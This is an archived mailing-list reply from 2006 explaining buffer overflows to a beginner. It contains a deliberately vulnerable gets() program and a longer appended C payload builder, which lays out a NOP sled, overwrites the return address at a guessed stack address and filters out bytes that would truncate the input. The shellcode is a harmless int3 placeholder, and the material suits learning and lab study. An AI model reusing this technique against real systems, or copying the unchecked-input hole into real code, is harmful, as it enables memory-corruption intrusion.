Vulnerability Development mailing list archives

Re: Buffer Overrun Newbie


From: James Longstreet <jlongs2 () uic edu>
Date: Wed, 8 Feb 2006 09:44:41 -0600 (CST)


On Sun, 5 Feb 2006 gj_williams2000 () yahoo co uk wrote:

> I was messing about with my pc trying to learn how buffer overruns work
> (mostly as an excuse to use assembler) and I have run into a problem.
>
> The program I am exploiting is just a simple c program I wrote which
> mismanages a string provided by the user by copying it into a 512 byte
> variable on the stack without checking its length.

I suggest that you try learning about buffer overflows with something
slightly more simple.  It's my understanding that shellcode is actually
relatively difficult to write for Windows.

If you have experience with Linux, or another Unix OS, I would suggest
starting there.  If you don't want to install Linux, you can even run it
in Bochs, QEMU, VMWare, etc.

Start with a simple exploitable C program:

#include <stdio.h>

int main()
{
        char buf[512];
        /* gets() has no length limit: input longer than 512 bytes runs past
         * buf into the rest of the stack frame (deliberately vulnerable). */
        gets(buf);
        return 0;
}

Try getting this to spawn a shell.  You can easily find shellcode on the
internet, or write your own.

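One way to build the input for that program, as an added example that is not part of the original post: the bytes are laid out so that they fill buf, run over the saved frame pointer and overwrite the saved return address with a guess that points back into a NOP sled in buf. The frame layout (32-bit x86, no stack protector, no ASLR), the guessed address 0xbffff5c0, and the int3 bytes standing in for real shellcode are all assumptions for illustration; confirm the layout and address on the real target with a debugger.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumed target frame layout (32-bit x86, no stack protector, no ASLR;
 * an assumption for illustration, confirm it on the real target in gdb):
 *
 *   buf[512] | saved frame pointer (4 bytes) | saved return address (4 bytes)
 *
 * Input longer than 512 bytes runs off the end of buf and over the saved
 * return address, so the payload is laid out as:
 *
 *   [NOP sled][shellcode][4 filler bytes][return address, repeated]
 */
#define BUF_SIZE      512
#define SAVED_FP_SIZE 4
#define RET_SIZE      4

/* Stand-in "shellcode": int3 breakpoints, so a hit is visible under a
 * debugger without spawning anything. Replace with real shellcode. */
static const unsigned char stand_in_shellcode[] = { 0xCC, 0xCC, 0xCC, 0xCC };

/* Lay out the payload in out (capacity cap). Returns the payload length,
 * or 0 if the shellcode does not fit in buf or out is too small. */
size_t build_payload(unsigned char *out, size_t cap, uint32_t ret_addr,
                     const unsigned char *sc, size_t sc_len, size_t ret_copies)
{
    size_t total = BUF_SIZE + SAVED_FP_SIZE + RET_SIZE * ret_copies;
    if (cap < total || sc_len > BUF_SIZE || ret_copies == 0)
        return 0;

    size_t sled = BUF_SIZE - sc_len;
    memset(out, 0x90, sled);                     /* NOP sled: landing anywhere here slides into sc */
    memcpy(out + sled, sc, sc_len);              /* shellcode ends exactly where buf ends */
    memset(out + BUF_SIZE, 'B', SAVED_FP_SIZE);  /* clobber the saved frame pointer */

    /* Write the return address little-endian, repeated so a small
     * misjudgement of the frame size still lands on it. */
    for (size_t i = 0; i < ret_copies; i++) {
        unsigned char *p = out + BUF_SIZE + SAVED_FP_SIZE + i * RET_SIZE;
        p[0] = (unsigned char)(ret_addr & 0xff);
        p[1] = (unsigned char)((ret_addr >> 8) & 0xff);
        p[2] = (unsigned char)((ret_addr >> 16) & 0xff);
        p[3] = (unsigned char)((ret_addr >> 24) & 0xff);
    }
    return total;
}

/* gets() stops reading at '\n', and a strcpy()-style copy stops at '\0',
 * so neither byte may appear anywhere in the payload. Returns the index
 * of the first offending byte, or -1 if the payload is clean. */
long find_bad_byte(const unsigned char *p, size_t len,
                   const unsigned char *bad, size_t bad_len)
{
    for (size_t i = 0; i < len; i++)
        for (size_t j = 0; j < bad_len; j++)
            if (p[i] == bad[j])
                return (long)i;
    return -1;
}

int main(void)
{
    static unsigned char payload[4096];
    const unsigned char bad[] = { 0x00, 0x0a };
    uint32_t guess = 0xbffff5c0u;  /* assumed address inside the sled; find yours in gdb */

    size_t n = build_payload(payload, sizeof payload, guess,
                             stand_in_shellcode, sizeof stand_in_shellcode, 3);
    if (n == 0) {
        fprintf(stderr, "payload would not fit\n");
        return 1;
    }
    long bad_at = find_bad_byte(payload, n, bad, sizeof bad);
    if (bad_at >= 0) {
        fprintf(stderr, "byte 0x%02x at offset %ld would truncate the input\n",
                payload[bad_at], bad_at);
        return 1;
    }
    /* Pipe into the target: ./mkpayload | ./vuln */
    fwrite(payload, 1, n, stdout);
    return 0;
}
```

The bad-byte check is the part people forget: a return address containing 0x0a is cut off by gets() before it ever reaches the stack, and one containing 0x00 is cut off by any strcpy()-style copy such as the one in the original poster's program, so the guess has to be adjusted (or the sled lengthened) until the whole payload is free of them.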